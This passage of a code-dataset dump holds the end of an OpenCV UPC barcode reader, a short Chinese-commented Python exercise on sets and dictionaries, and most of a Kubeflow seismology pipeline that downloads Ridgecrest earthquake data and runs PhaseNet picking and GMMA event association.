np.concatenate((full_code[3:27],full_code[32:56]))\n\treturn full_code\n\n\ndef get_UPC(img):\n\t\"\"\"Returns UPC code for cropped barcode image\n\n\tParameters:\n\t\timg (ndarra): image object of cropped barcode\n\n\tReturns:\n\t\tlist: UPC barcode where each digit is an element in the list\n\t\"\"\"\n\tprocessed_image = preprocess_image(img)\n\t#ordered_barcode_rectangles = get_barcode_rectangles(processed_image)\n\t#full_code = classify_bars(ordered_barcode_rectangles)\n\twidths = measure_bars(processed_image)\n\tfull_code = classify_widths(widths)\n\treturn list(translate_to_numbers(full_code))\n\ndef reorient(img):\n\t\"\"\"Takes rotated image of cropped barcode and rotates so that bars are vertical\n\n\tParameters:\n\t\timg (ndarray): cropped image of rotated barcode\n\n\tReturns:\n\t\tndarray: straightened barcode image\n\t\"\"\"\n\trows,cols = img.shape\n\timg = cv.copyMakeBorder(img,5,5,5,5,cv.BORDER_CONSTANT,value = 255)\n\trectangles = get_barcode_rectangles(img)\n\tmedian_angle = np.median([rect[2] for rect in rectangles])\n\tM = cv.getRotationMatrix2D((cols/2,rows/2),median_angle,1)\n\tdst = cv.warpAffine(img,M,(cols,rows),borderMode = cv.BORDER_CONSTANT,borderValue = 255)\n\treturn dst\n\n\ndef blank_mask(gray_img):\n\t\"\"\"Returns black image in GRAY format the shape of gray_img\n\n\tParameters:\n\t\tgray_img (ndarray): image in GRAY format for mask to be the same size as\n\n\tReturns:\n\t\tndarray: image the same size as gray_img with all pixels black\n\t\"\"\"\n\n\t_,mask = cv.threshold(np.uint8(gray_img),255,255,cv.THRESH_BINARY)\n\treturn mask\n\ndef std_rect(endpts):\n\t\"\"\"Returns the smallest rectangle whose edges are parallel to image edges that completely encompasses all points in endpts\n\n\tParameters:\n\t\tendpts (list): list of endpoints to construct rectangle around\n\n\tReturns:\n\t\ttuple: minimum x value, maximum x value, minimum y value, maximum y vale\n\t\"\"\"\n\n\tx_vals = [pt[0] for pt in endpts]\n\ty_vals = [pt[1] for pt in endpts]\n\treturn (min(x_vals),max(x_vals),min(y_vals),max(y_vals))\n\n\ndef isolate_barcode(img):\n\t\"\"\"Takes image file containing a barcode and returns an image file of the cropped barcode\n\n\tParameters:\n\t\timg (ndarray): image with barcode in BGR format\n\n\tReturns:\n\t\tndarray: cropped image of 
barcode in BGR format\n\t\"\"\"\n\timg = cv.resize(img,(1920,1080))\n\tgray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\tret,BW = cv.threshold(gray,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\tedged = cv.Canny(BW, 50, 100, 2)\n\tblurred = cv.GaussianBlur(edged, (3, 3),0)#last gray\n\n\trectangles = get_barcode_rectangles(blurred)\n\tBW = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\tmask = blank_mask(BW)\n\tboxes = draw_contours(mask,make_box(rectangles),thickness = 5)\n\tboxes = cv.GaussianBlur(boxes, (15, 15),0)\n\n\tboxes = cv.dilate(boxes,None,iterations = 35)\n\n\tgray_boxes = cv.cvtColor(boxes, cv.COLOR_BGR2GRAY)\n\t_,BW_boxes = cv.threshold(np.uint8(gray_boxes),100,255,cv.THRESH_BINARY)\n\n\tcontours, hierarchy = cv.findContours(BW_boxes, mode=cv.RETR_LIST, method=cv.CHAIN_APPROX_SIMPLE)\n\trectangles = np.array([cv.minAreaRect(cnt) for cnt in contours])\n\tlargest_barcode_rectangle = np.array(sorted(rectangles,key=lambda x:x[1][0]*x[1][1],reverse=True))[0]\n\n\tminx, maxx, miny, maxy = std_rect(np.int0(cv.boxPoints(tuple(largest_barcode_rectangle))))\n\twidth = maxx - minx\n\theight = maxy - miny\n\n\tif minx<0:\n\t\tminx = 0\n\tif miny < 0:\n\t\tminy=0\n\n\t#barcode = img[max(int(miny - 0.1*width),0) :min(int(maxy + 0.1*width),1920),minx:maxx)\n\n\tbarcode = img[miny:maxy,minx:maxx]\n\t\n\treturn barcode","sub_path":"process_image/barcode_reader.py","file_name":"barcode_reader.py","file_ext":"py","file_size_in_byte":13675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"544494570","text":"#集合\n#构建集合的两种方法\n\nA={'a','b','c','c',1}#然后每个元素用逗号隔开,字符串类型的数据需要加定界符\n\nB=set('aabbcce')#注意使用的是小括号,所有元素放在一起\n#print(A,B)\n\n#集合之间的运算\n#集合的差(补)\n#print(A-B)\n#集合的并集\n#print(A|B)\n#集合的交集\n#print(A&B)\n#不同时包含\n#print(A^B)\n\n#集合的增删\n#添加元素的两种方法\n#A.add('d')\n#B.update({1,3},[4,2],'e')\n#print(A)\n#print(B)\n\n#删除元素的三种方法\n#A.remove('a')\n#B.remove('f')\n#A.discard('f')\n#A.pop()\n\n\n\n#字典\n\ndic={'name':'张','age':19,'school':'sctu'}\n\n#修改数据\ndic['name']='李四'\n#print(dic)\n\n#查找数据\n#dic.get('address')\n#dic.setdefault('name')\n#dic.setdefault('address',default='成都')\n#print(dic)\n\n#增加数据\n#dic['class']='1班'\n\n#删除数据\n#del dic['name']\n\ndic.pop('age')\nprint(dic)\n#dic.popitem()","sub_path":"1906101092董照岚/day0225/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"636440335","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[1]:\n\n\n#os.system('git clone -b factorize https://github.com/wayneweiqiang/PhaseNet.git')\n#os.system('git clone https://github.com/wayneweiqiang/GMMA.git')\n#os.system('conda env create quakeflow --file=env.yml')\n#os.system('conda activate quakeflow')\n#os.system('python -m ipykernel install --user --name=quakeflow')\n## select jupyter notebook kernel to quakflow\n\n\n# In[2]:\n\n\nimport kfp\nimport kfp.dsl as dsl\nimport kfp.components as comp\nfrom kfp.components import InputPath, OutputPath\n\n\n# In[12]:\n\n\nimport os\nimport matplotlib\nmatplotlib.use(\"agg\")\nimport matplotlib.pyplot as plt\n\ndir_name = \"ridgecrest\"\nif not os.path.exists(dir_name):\n os.mkdir(dir_name)\nroot_dir = lambda x: os.path.join(dir_name, x)\n\n\n# In[13]:\n\n\ndef set_config(index_pkl: OutputPath(\"pickle\"),\n config_pkl: OutputPath(\"pickle\"), \n datetime_pkl: OutputPath(\"pickle\")) -> list:\n \n import obspy\n import os\n import pickle\n import 
datetime\n import numpy as np\n \n pi = 3.1415926\n degree2km = pi*6371/180\n \n ## Location\n# center = (-115.53, 32.98) #salton sea\n center = (-117.504, 35.705) #ridgecrest\n horizontal_degree = 1.0\n vertical_degree = 1.0\n\n ## Time range\n# starttime = obspy.UTCDateTime(\"2020-10-01T00\") #salton sea\n# endtime = obspy.UTCDateTime(\"2020-10-03T00\") ## not included\n starttime = obspy.UTCDateTime(\"2019-07-04T00\") #ridgecrest\n endtime = obspy.UTCDateTime(\"2019-07-05T00\") ## not included\n\n ## seismic stations\n network_list = \"CI\"\n# channel_list = \"HNE,HNN,HNZ,HHE,HHN,HHZ,BHE,BHN,BHZ,EHE,EHN,EHZ\"\n channel_list = \"HHE,HHN,HHZ\"\n \n ## data center\n client = \"SCEDC\"\n\n ####### save config ########\n config = {}\n config[\"center\"] = center\n config[\"xlim_degree\"] = [center[0]-horizontal_degree/2, center[0]+horizontal_degree/2]\n config[\"ylim_degree\"] = [center[1]-vertical_degree/2, center[1]+vertical_degree/2]\n config[\"degree2km\"] = degree2km\n config[\"starttime\"] = starttime.datetime\n config[\"endtime\"] = endtime.datetime\n config[\"networks\"] = network_list\n config[\"channels\"] = channel_list\n config[\"client\"] = client\n\n with open(config_pkl, \"wb\") as fp:\n pickle.dump(config, fp)\n \n one_day = datetime.timedelta(days=1)\n one_hour = datetime.timedelta(hours=1)\n starttimes = []\n tmp_start = starttime\n while tmp_start < endtime:\n starttimes.append(tmp_start.datetime)\n tmp_start += one_hour\n \n with open(datetime_pkl, \"wb\") as fp:\n pickle.dump({\"starttimes\": starttimes, \"interval\": one_hour}, fp)\n \n num_parallel = 1\n \n idx = [[] for i in range(num_parallel)]\n for i in range(len(starttimes)):\n idx[i - i//num_parallel*num_parallel].append(i)\n \n with open(index_pkl, \"wb\") as fp:\n pickle.dump(idx, fp)\n\n return list(range(num_parallel))\n\n\n# In[18]:\n\n\nidx = set_config(root_dir(\"index.pkl\"), root_dir(\"config.pkl\"), root_dir(\"datetimes.pkl\"))\n# print(idx)\n# with open(root_dir(\"datetimes.pkl\"), \"rb\") as fp:\n# data = pickle.load(fp)\n# print(data)\n\n\n# In[19]:\n\n\nconfig_op = comp.func_to_container_op(set_config, \n base_image='python:3.8',\n packages_to_install= [\n \"numpy\",\n \"obspy\"\n ])\n\n\n# In[20]:\n\n\ndef download_events(config_pkl: InputPath(\"pickle\"),\n event_csv: OutputPath(str)):\n \n import pickle, os\n import obspy\n from obspy.clients.fdsn import Client\n from collections import defaultdict\n import pandas as pd\n# import matplotlib\n# matplotlib.use(\"agg\")\n# import matplotlib.pyplot as plt\n \n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n \n ####### IRIS catalog ########\n events = Client(\"IRIS\").get_events(starttime=config[\"starttime\"],\n endtime=config[\"endtime\"],\n minlongitude=config[\"xlim_degree\"][0],\n maxlongitude=config[\"xlim_degree\"][1],\n minlatitude=config[\"ylim_degree\"][0],\n maxlatitude=config[\"ylim_degree\"][1])#,\n# filename='events.xml')\n\n# events = obspy.read_events('events.xml')\n print(f\"Number of events: {len(events)}\")\n# events.plot('local', outfile=\"events.png\")\n# events.plot('local')\n\n ####### Save catalog ########\n catalog = defaultdict(list)\n for event in events:\n catalog[\"time\"].append(event.origins[0].time.datetime)\n catalog[\"magnitude\"].append(event.magnitudes[0].mag)\n catalog[\"longitude\"].append(event.origins[0].longitude)\n catalog[\"latitude\"].append(event.origins[0].latitude)\n catalog[\"depth(m)\"].append(event.origins[0].depth)\n catalog = pd.DataFrame.from_dict(catalog).sort_values([\"time\"])\n 
catalog.to_csv(event_csv,\n sep=\"\\t\", index=False, float_format=\"%.3f\",\n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"time\", \"magnitude\", \"longitude\", \"latitude\", \"depth(m)\"])\n\n ####### Plot catalog ########\n plt.figure()\n plt.plot(catalog[\"longitude\"], catalog[\"latitude\"], '.', markersize=1)\n plt.xlabel(\"Longitude\")\n plt.ylabel(\"Latitude\")\n plt.axis(\"scaled\")\n# plt.savefig(os.path.join(data_path, \"events_loc.png\"))\n # plt.show()\n \n plt.figure()\n plt.plot_date(catalog[\"time\"], catalog[\"magnitude\"], '.', markersize=1)\n plt.gcf().autofmt_xdate()\n plt.ylabel(\"Magnitude\")\n plt.title(f\"Number of events: {len(events)}\")\n# plt.savefig(os.path.join(data_path, \"events_mag_time.png\"))\n # plt.show()\n\n\n# In[21]:\n\n\ndownload_events(root_dir(\"config.pkl\"), root_dir(\"events.csv\"))\n\n\n# In[22]:\n\n\ndownload_events_op = comp.func_to_container_op(download_events, \n base_image='python:3.8',\n packages_to_install= [\n \"obspy\",\n \"pandas\",\n# \"matplotlib\"\n ])\n\n\n# In[23]:\n\n\ndef download_stations(config_pkl: InputPath(\"pickle\"),\n station_csv: OutputPath(str),\n station_pkl: OutputPath(\"pickle\")):\n \n import pickle, os\n import obspy\n from obspy.clients.fdsn import Client\n from collections import defaultdict\n import pandas as pd\n# import matplotlib\n# matplotlib.use(\"agg\")\n# import matplotlib.pyplot as plt\n \n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n\n ####### Download stations ########\n stations = Client(\"IRIS\").get_stations(network = config[\"networks\"],\n station = \"*\",\n starttime=config[\"starttime\"],\n endtime=config[\"endtime\"],\n minlongitude=config[\"xlim_degree\"][0],\n maxlongitude=config[\"xlim_degree\"][1],\n minlatitude=config[\"ylim_degree\"][0],\n maxlatitude=config[\"ylim_degree\"][1],\n channel=config[\"channels\"],\n level=\"response\")#,\n# filename=\"stations.xml\")\n\n# stations = obspy.read_inventory(\"stations.xml\")\n print(\"Number of stations: {}\".format(sum([len(x) for x in stations])))\n # stations.plot('local', outfile=\"stations.png\")\n # stations.plot('local')\n \n ####### Save stations ########\n station_locs = defaultdict(dict)\n for network in stations:\n for station in network:\n for chn in station:\n sid = f\"{network.code}.{station.code}.{chn.location_code}.{chn.code[:-1]}\"\n if sid in station_locs:\n station_locs[sid][\"component\"] += f\",{chn.code[-1]}\"\n station_locs[sid][\"response\"] += f\",{chn.response.instrument_sensitivity.value:.2f}\"\n else:\n component = f\"{chn.code[-1]}\"\n response = f\"{chn.response.instrument_sensitivity.value:.2f}\"\n dtype = chn.response.instrument_sensitivity.input_units.lower()\n tmp_dict = {}\n tmp_dict[\"longitude\"], tmp_dict[\"latitude\"], tmp_dict[\"elevation(m)\"] = chn.longitude, chn.latitude, chn.elevation\n tmp_dict[\"component\"], tmp_dict[\"response\"], tmp_dict[\"unit\"] = component, response, dtype\n station_locs[sid] = tmp_dict\n \n station_locs = pd.DataFrame.from_dict(station_locs, orient='index')\n station_locs.to_csv(station_csv,\n sep=\"\\t\", float_format=\"%.3f\",\n index_label=\"station\",\n columns=[\"longitude\", \"latitude\", \"elevation(m)\", \"unit\", \"component\", \"response\"])\n\n with open(station_pkl, \"wb\") as fp:\n pickle.dump(stations, fp)\n \n# ####### Plot stations ########\n plt.figure()\n plt.plot(station_locs[\"longitude\"], station_locs[\"latitude\"], \"^\", label=\"Stations\")\n plt.xlabel(\"X (km)\")\n plt.ylabel(\"Y (km)\")\n plt.axis(\"scaled\")\n 
plt.legend()\n plt.title(f\"Number of stations: {len(station_locs)}\")\n# plt.savefig(os.path.join(data_path, \"stations_loc.png\"))\n # plt.show()\n\n\n# In[24]:\n\n\ndownload_stations(root_dir(\"config.pkl\"), root_dir(\"stations.csv\"), root_dir(\"stations.pkl\"))\n\n\n# In[25]:\n\n\ndownload_stations_op = comp.func_to_container_op(download_stations, \n base_image='python:3.8',\n packages_to_install= [\n \"obspy\",\n \"pandas\",\n# \"matplotlib\"\n ])\n\n\n# In[26]:\n\n\ndef download_waveform(i: int, \n index_pkl: InputPath(\"pickle\"),\n config_pkl: InputPath(\"pickle\"),\n datetime_pkl: InputPath(\"pickle\"),\n station_pkl: InputPath(\"pickle\"),\n fname_csv: OutputPath(str),\n data_path:str = \"/tmp\"\n# bucket_name:str = \"waveforms\",\n# s3_url:str = \"localhost:9000\", \n# secure:bool = True\n ) -> str:\n \n import pickle, os\n import obspy\n from obspy.clients.fdsn import Client\n import time\n import threading\n lock = threading.Lock()\n \n# from minio import Minio\n# minioClient = Minio(s3_url,\n# access_key='minio',\n# secret_key='minio123',\n# secure=secure)\n \n# if not minioClient.bucket_exists(bucket_name):\n# minioClient.make_bucket(bucket_name)\n\n with open(index_pkl, \"rb\") as fp:\n index = pickle.load(fp)\n idx = index[i]\n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n with open(datetime_pkl, \"rb\") as fp:\n tmp = pickle.load(fp)\n starttimes = tmp[\"starttimes\"]\n interval = tmp[\"interval\"]\n with open(station_pkl, \"rb\") as fp:\n stations = pickle.load(fp)\n \n# waveform_dir = os.path.join(\"/tmp/\", bucket_name)\n waveform_dir = os.path.join(data_path, \"waveforms\")\n if not os.path.exists(waveform_dir):\n os.makedirs(waveform_dir)\n \n ####### Download data ########\n client = Client(config[\"client\"])\n fname_list = [\"fname\"]\n \n def download(i):\n# for i in idx: \n starttime = obspy.UTCDateTime(starttimes[i]) \n endtime = starttime + interval\n fname = \"{}.mseed\".format(starttime.datetime.strftime(\"%Y-%m-%dT%H:%M:%S\"))\n# if not overwrite:\n if os.path.exists(os.path.join(waveform_dir, fname)):\n print(f\"{fname} exists\")\n fname_list.append(fname)\n# continue\n return\n max_retry = 10\n stream = obspy.Stream()\n print(f\"{fname} download starts\")\n for network in stations:\n for station in network:\n print(f\"********{network.code}.{station.code}********\")\n retry = 0\n while retry < max_retry:\n try:\n tmp = client.get_waveforms(network.code, station.code, \"*\", config[\"channels\"], starttime, endtime)\n stream += tmp\n break\n except Exception as e:\n print(\"Error {}.{}: {}\".format(network.code, station.code,e))\n err = e\n retry += 1\n time.sleep(1)\n continue\n if retry == max_retry:\n print(f\"{fname}: MAX {max_retry} retries reached : {network.code}.{station.code} with error: {err}\")\n\n\n stream.write(os.path.join(waveform_dir, fname))\n print(f\"{fname} download succeeds\")\n# minioClient.fput_object(bucket_name, fname, os.path.join(waveform_dir, fname))\n lock.acquire()\n fname_list.append(fname)\n lock.release()\n \n threads = []\n for i in idx:\n t = threading.Thread(target=download, args=(i,))\n t.start()\n threads.append(t)\n for t in threads:\n t.join()\n \n with open(fname_csv, \"w\") as fp:\n fp.write(\"\\n\".join(fname_list))\n\n return waveform_dir\n\n\n# In[27]:\n\n\nwaveform_path = download_waveform(0, root_dir(\"index.pkl\"), root_dir(\"config.pkl\"), root_dir(\"datetimes.pkl\"), root_dir(\"stations.pkl\"), root_dir(\"fname.csv\"), data_path=root_dir(\"\"))\n\n\n# In[28]:\n\n\ndownload_waveform_op 
= comp.func_to_container_op(download_waveform, \n base_image='python:3.8',\n packages_to_install= [\n \"obspy\",\n# \"minio\"\n ])\n\n\n# In[29]:\n\n\ndef phasenet_op(data_path: str, \n data_list: str, \n stations: str):\n\n return dsl.ContainerOp(name='PhaseNet picking',\n image=\"zhuwq0/phasenet:latest\",\n command=['python'],\n arguments=[\n 'predict.py',\n '--model', \"model/190703-214543\",\n '--data_dir', data_path,\n '--data_list', dsl.InputArgumentPath(data_list),\n '--stations', dsl.InputArgumentPath(stations),\n# '--result_dir', \"results\",\n '--input_mseed',\n '--amplitude'\n ],\n file_outputs = {\"picks\": \"/opt/results/picks.json\"}\n )\n\n\n# In[46]:\n\n\ncommand = f\"python PhaseNet/phasenet/predict.py --model=PhaseNet/model/190703-214543 --data_list={root_dir('fname.csv')} --data_dir={root_dir('waveforms')} --stations={root_dir('stations.csv')} --result_dir={root_dir('phasenet')} --format=mseed_array --amplitude\"\nprint(command)\nos.system(f'{command}')\n\n\n# In[219]:\n\n\ndef gmma(i: int,\n index_pkl: InputPath(\"pickle\"),\n config_pkl: InputPath(\"pickle\"),\n pick_json: InputPath(\"json\"),\n station_csv: InputPath(str),\n catalog_csv: OutputPath(str),\n picks_csv: OutputPath(str),\n bucket_name:str = \"catalogs\",\n s3_url:str = \"localhost:9000\", \n secure:bool = True) -> str:\n \n import pandas as pd\n from datetime import datetime, timedelta\n from gmma import mixture\n import numpy as np\n from sklearn.cluster import DBSCAN \n from datetime import datetime, timedelta\n import os\n import json\n import pickle\n from tqdm import tqdm\n \n to_seconds = lambda t: t.timestamp(tz=\"UTC\")\n from_seconds = lambda t: pd.Timestamp.utcfromtimestamp(t).strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3]\n # to_seconds = lambda t: datetime.strptime(t, \"%Y-%m-%dT%H:%M:%S.%f\").timestamp()\n # from_seconds = lambda t: [datetime.utcfromtimestamp(x).strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3] for x in t]\n\n def convert_picks_csv(picks, stations, config):\n t = picks[\"timestamp\"].apply(lambda x: x.timestamp()).to_numpy()\n a = picks[\"amp\"].apply(lambda x: np.log10(x*1e2)).to_numpy()\n data = np.stack([t, a]).T\n meta = pd.merge(stations, picks[\"id\"], on=\"id\")\n locs = meta[config[\"dims\"]].to_numpy()\n phase_type = picks[\"type\"].apply(lambda x: x.lower()).to_numpy()\n phase_weight = picks[\"prob\"].to_numpy()[:,np.newaxis]\n return data, locs, phase_type, phase_weight\n\n def association(data, locs, phase_type, phase_weight, num_sta, pick_idx, event_idx0, config, pbar=None):\n\n db = DBSCAN(eps=config[\"dbscan_eps\"], min_samples=config[\"dbscan_min_samples\"]).fit(np.hstack([data[:,0:1], locs[:,:2]/6.0]))#.fit(data[:,0:1])\n labels = db.labels_\n unique_labels = set(labels)\n events = []\n preds = []\n probs = []\n \n assignment = []\n for k in unique_labels:\n if k == -1:\n continue\n \n class_mask = (labels == k)\n data_ = data[class_mask]\n locs_ = locs[class_mask]\n phase_type_ = phase_type[class_mask]\n phase_weight_ = phase_weight[class_mask]\n pick_idx_ = pick_idx[class_mask]\n \n if pbar is not None:\n pbar.set_description(f\"Process {len(data_)} picks\")\n\n num_event_ = min(max(int(len(data_)/min(num_sta,10)*config[\"oversample_factor\"]), 1), len(data_))\n t_range = max(data_[:,0].max() - data_[:,0].min(), 1)\n centers_init = np.vstack([np.ones(num_event_)*np.mean(stations[\"x(km)\"]),\n np.ones(num_event_)*np.mean(stations[\"y(km)\"]),\n np.zeros(num_event_),\n np.linspace(data_[:,0].min()-0.1*t_range, data_[:,0].max()+0.1*t_range, num_event_)]).T # n_eve, n_dim(x, 
y, z) + 1(t)\n\n if config[\"use_amplitude\"]:\n covariance_prior = np.array([[1,0],[0,1]]) * 3\n else:\n covariance_prior = np.array([[1]])\n data = data[:,0:1]\n \n gmm = mixture.BayesianGaussianMixture(n_components=num_event_, \n weight_concentration_prior=1000/num_event_,\n mean_precision_prior=0.3/t_range,\n covariance_prior=covariance_prior,\n init_params=\"centers\",\n centers_init=centers_init, \n station_locs=locs_, \n phase_type=phase_type_, \n phase_weight=phase_weight_,\n loss_type=\"l1\",\n bounds=config[\"bfgs_bounds\"],\n max_covar=10.0,\n reg_covar=0.1,\n ).fit(data_) \n\n pred = gmm.predict(data_) \n prob_matrix = gmm.predict_proba(data_)\n prob_eq = prob_matrix.mean(axis=0)\n# prob = prob_matrix[range(len(data_)), pred]\n# score = gmm.score(data_)\n# score_sample = gmm.score_samples(data_)\n prob = np.exp(gmm.score_samples(data_))\n\n idx = np.array([True if len(data_[pred==i, 0]) >= config[\"min_picks_per_eq\"] else False for i in range(len(prob_eq))]) #& (prob_eq > 1/num_event) #& (sigma_eq[:, 0,0] < 40)\n\n time = gmm.centers_[idx, len(config[\"dims\"])]\n loc = gmm.centers_[idx, :len(config[\"dims\"])]\n if config[\"use_amplitude\"]:\n mag = gmm.centers_[idx, len(config[\"dims\"])+1]\n sigma_eq = gmm.covariances_[idx,...]\n\n for i in range(len(time)):\n tmp = {\"time(s)\": time[i],\n \"magnitude\": mag[i],\n \"sigma\": sigma_eq[i].tolist()}\n for j, k in enumerate(config[\"dims\"]):\n tmp[k] = loc[i][j]\n events.append(tmp)\n \n for i in range(len(pick_idx_)):\n assignment.append((pick_idx_[i], pred[i]+event_idx0, prob[i]))\n \n event_idx0 += len(time)\n \n return events, assignment\n \n \n catalog_dir = os.path.join(\"/tmp/\", bucket_name)\n if not os.path.exists(catalog_dir):\n os.makedirs(catalog_dir)\n \n with open(index_pkl, \"rb\") as fp:\n index = pickle.load(fp)\n idx = index[i]\n\n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n \n ## read picks\n picks = pd.read_json(pick_json)\n picks[\"time_idx\"] = picks[\"timestamp\"].apply(lambda x: x.strftime(\"%Y-%m-%dT%H\")) ## process by hours\n\n ## read stations\n stations = pd.read_csv(station_csv, delimiter=\"\\t\")\n stations = stations.rename(columns={\"station\":\"id\"})\n stations[\"x(km)\"] = stations[\"longitude\"].apply(lambda x: (x - config[\"center\"][0])*config[\"degree2km\"])\n stations[\"y(km)\"] = stations[\"latitude\"].apply(lambda x: (x - config[\"center\"][1])*config[\"degree2km\"])\n stations[\"z(km)\"] = stations[\"elevation(m)\"].apply(lambda x: -x/1e3)\n\n ### setting GMMA configs\n config[\"dims\"] = ['x(km)', 'y(km)', 'z(km)']\n config[\"use_dbscan\"] = True\n config[\"use_amplitude\"] = True\n dx = (np.array(config[\"xlim_degree\"])-np.array(config[\"center\"][0]))*config[\"degree2km\"]\n dy = (np.array(config[\"ylim_degree\"])-np.array(config[\"center\"][1]))*config[\"degree2km\"]\n dz = 21\n # DBSCAN\n config[\"bfgs_bounds\"] = ((dx[0]-1, dx[1]+1), #x\n (dy[0]-1, dy[1]+1), #y\n (0, dz), #x\n (None, None)) #t\n config[\"dbscan_eps\"] = min(np.sqrt((stations[\"x(km)\"].max()-stations[\"x(km)\"].min())**2 +\n (stations[\"y(km)\"].max()-stations[\"y(km)\"].min())**2)/(6.0/1.75), 10)\n config[\"dbscan_min_samples\"] = min(len(stations), 5)\n # Filtering\n config[\"min_picks_per_eq\"] = min(len(stations)//2, 5)\n config[\"oversample_factor\"] = min(len(stations)//2, 5)\n print(\"Config: \", config)\n\n ## run GMMA association\n catalogs = []\n pbar = tqdm(sorted(list(set(picks[\"time_idx\"]))))\n event_idx0 = 0 ## current earthquake index\n assignments = []\n for i, hour in 
enumerate(pbar):\n picks_ = picks[picks[\"time_idx\"] == hour]\n data, locs, phase_type, phase_weight = convert_picks_csv(picks_, stations, config)\n catalog, assign = association(data, locs, phase_type, phase_weight, len(stations), picks_.index.to_numpy(), event_idx0, config, pbar)\n event_idx0 += len(catalog)\n catalogs.extend(catalog)\n assignments.extend(assign)\n \n ## create catalog\n catalogs = pd.DataFrame(catalogs, columns=[\"time(s)\"]+config[\"dims\"]+[\"magnitude\", \"sigma\"])\n catalogs[\"time\"] = catalogs[\"time(s)\"].apply(lambda x: from_seconds(x))\n catalogs[\"longitude\"] = catalogs[\"x(km)\"].apply(lambda x: x/config[\"degree2km\"] + config[\"center\"][0])\n catalogs[\"latitude\"] = catalogs[\"y(km)\"].apply(lambda x: x/config[\"degree2km\"] + config[\"center\"][1])\n catalogs[\"depth(m)\"] = catalogs[\"z(km)\"].apply(lambda x: x*1e3)\n catalogs[\"event_idx\"] = range(event_idx0)\n if config[\"use_amplitude\"]:\n catalogs[\"covariance\"] = catalogs[\"sigma\"].apply(lambda x: f\"{x[0][0]:.3f},{x[1][1]:.3f},{x[0][1]:.3f}\")\n else:\n catalogs[\"covariance\"] = catalogs[\"sigma\"].apply(lambda x: f\"{x[0][0]:.3f}\")\n with open(catalog_csv, 'w') as fp:\n catalogs.to_csv(fp, sep=\"\\t\", index=False, \n float_format=\"%.3f\",\n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"time\", \"magnitude\", \"longitude\", \"latitude\", \"depth(m)\", \"covariance\", \"event_idx\"])\n \n ## add assignment to picks\n assignments = pd.DataFrame(assignments, columns=[\"pick_idx\", \"event_idx\", \"prob_gmma\"])\n picks = picks.join(assignments.set_index(\"pick_idx\")).fillna(-1).astype({'event_idx': int})\n with open(picks_csv, 'w') as fp:\n picks.to_csv(fp, sep=\"\\t\", index=False, \n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"id\", \"timestamp\", \"type\", \"prob\", \"amp\", \"event_idx\", \"prob_gmma\"])\n \n ## upload to s3 bucket\n try:\n from minio import Minio\n minioClient = Minio(s3_url,\n access_key='minio',\n secret_key='minio123',\n secure=secure)\n if not minioClient.bucket_exists(bucket_name):\n minioClient.make_bucket(bucket_name)\n \n with open(os.path.join(catalog_dir, f\"catalog_{idx[0]:04d}.csv\"), 'w') as fp:\n catalogs.to_csv(fp, sep=\"\\t\", index=False, \n float_format=\"%.3f\",\n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"time\", \"magnitude\", \"longitude\", \"latitude\", \"depth(m)\"])\n minioClient.fput_object(bucket_name, f\"catalog_{i:04d}.csv\", os.path.join(catalog_dir, f\"catalog_{i:04d}.csv\"))\n except Exception as e:\n print(\"ERROR: can not access minio service!\")\n \n return f\"catalog_{i:04d}.csv\"\n \n\n\n# In[220]:\n\n\ncatalog = gmma(0, root_dir(\"index.pkl\"), root_dir(\"config.pkl\"), root_dir(\"phasenet/picks.json\"), root_dir(\"stations.csv\"), root_dir(\"catalog.csv\"), root_dir(\"picks.csv\"))\n# bucket_name=\"catalogs\", s3_url=\"localhost:9000\", secure=False)\n\n\n# In[53]:\n\n\ngmma_op = comp.func_to_container_op(gmma, \n base_image='python:3.8',\n packages_to_install= [\n \"pandas\",\n \"numpy\",\n \"scikit-learn\",\n \"minio\",\n \"gmma\"\n ])\n\n\n# In[54]:\n\n\ndef combine_catalog(catalog_csv: OutputPath(str),\n bucket_name:str = \"catalogs\",\n s3_url:str = \"minio-service:9000\", \n secure:bool = True):\n \n import pandas as pd\n from glob import glob\n import os\n \n from minio import Minio\n minioClient = Minio(s3_url,\n access_key='minio',\n secret_key='minio123',\n secure=secure)\n objects = minioClient.list_objects(bucket_name, recursive=True)\n \n tmp_path = lambda x: os.path.join(\"/tmp/\", x)\n for obj in 
objects:\n minioClient.fget_object(bucket_name, obj._object_name, tmp_path(obj._object_name))\n \n files_catalog = sorted(glob(tmp_path(\"catalog_*.csv\")))\n\n if len(files_catalog) > 0:\n combined_catalog = pd.concat([pd.read_csv(f, sep=\"\\t\", dtype=str) for f in files_catalog]).sort_values(by=\"time\")\n combined_catalog.to_csv(tmp_path(\"combined_catalog.csv\"), sep=\"\\t\", index=False)\n minioClient.fput_object(bucket_name, f\"combined_catalog.csv\", tmp_path(\"combined_catalog.csv\"))\n with open(catalog_csv, \"w\") as fout:\n with open(tmp_path(\"combined_catalog.csv\"), \"r\") as fin:\n for line in fin:\n fout.write(line)\n else:\n with open(catalog_csv, \"w\") as fout:\n pass\n print(\"No events.csv found!\")\n\n\n# In[55]:\n\n\n# combine_catalog(\"catalog.csv\", bucket_name=\"catalogs\", s3_url=\"localhost:9000\", secure=True)\n\n\n# In[56]:\n\n\ncombine_op = comp.func_to_container_op(combine_catalog, \n base_image='python:3.8',\n packages_to_install= [\n \"pandas\",\n \"minio\"\n ])\n\n\n# In[57]:\n\n\n# Define the pipeline\n@dsl.pipeline(name='QuakeFlow', description='')\ndef quakeflow_pipeline(data_path:str = \"/tmp/\", \n bucket_catalog:str = 